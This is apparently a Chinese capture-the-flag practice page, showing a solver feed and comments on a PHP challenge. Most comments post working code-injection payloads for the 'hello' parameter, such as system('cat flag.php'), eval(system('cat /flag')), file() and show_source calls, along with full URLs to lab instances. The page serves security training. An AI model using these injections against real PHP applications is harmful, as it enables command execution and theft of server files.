评分(10)
解题动态
yuu鱼 攻破了该题 2小时前
kxzzy 攻破了该题 8小时前
box 攻破了该题 9小时前
yinlin 攻破了该题 18小时前
doushabao 攻破了该题 22小时前
sokfock 攻破了该题 22小时前
我不是张先茂 攻破了该题 23小时前
HDY 攻破了该题 23小时前
临安 攻破了该题 23小时前
yyy1024 攻破了该题 1天前
twenty 攻破了该题 1天前
旦旦 攻破了该题 1天前
时雨 攻破了该题 1天前
白科技 攻破了该题 1天前
bubu1212 攻破了该题 1天前
xing0011 攻破了该题 1天前
周文君 攻破了该题 2天前
zhao涵 攻破了该题 2天前
yiyiyiyi1 攻破了该题 2天前
评论
wyz 6天前
举报
构造?hello=);system('cat flag.php');//,直接抓包,就找到flag
b2026tf 7天前
举报
http://171.80.2.169:17829/?hello=eval(system(%27cat%20/flag%27))
syhaisy 13天前
举报
GET /?hello=system('cat+flag.php') HTTP/1.1
FTJJJ 19天前
举报
?hello=eval(system('cat flag.php|grep {'))
kitniu 1月前
举报
file()是 " 的HTML 实体编码,是 PHP 内置的文件系统函数,核心功能是将整个文件按行读入一个字符串数组,每行(含换行符)为一个数组元素。 http://171.80.2.169:10115/?hello=file(%27flag.php%27)
qth18700737704 1月前
举报
?hello=eval(system(%27cat%20/flag%27))
19153693078 1月前
举报
根据代码php文件中包含flag.php 将传值hello得结果赋值给a,输出a得值,?hello=1 输出int 1,尝试将结果换成flag.php输出string(8) "flag.php",格式还是有问题的,考虑其是php文件,尝试?hello=file("flag.php"),得到文件中内容
auroraSEA 1月前
举报
?hello=show_source(%27flag.php%27)
chm 4月前
举报
http://171.80.2.169:19841/?hello=file(%22flag.php%22)
yiya咿呀 4月前
举报
url/?hello=eval(system('cat /flag'))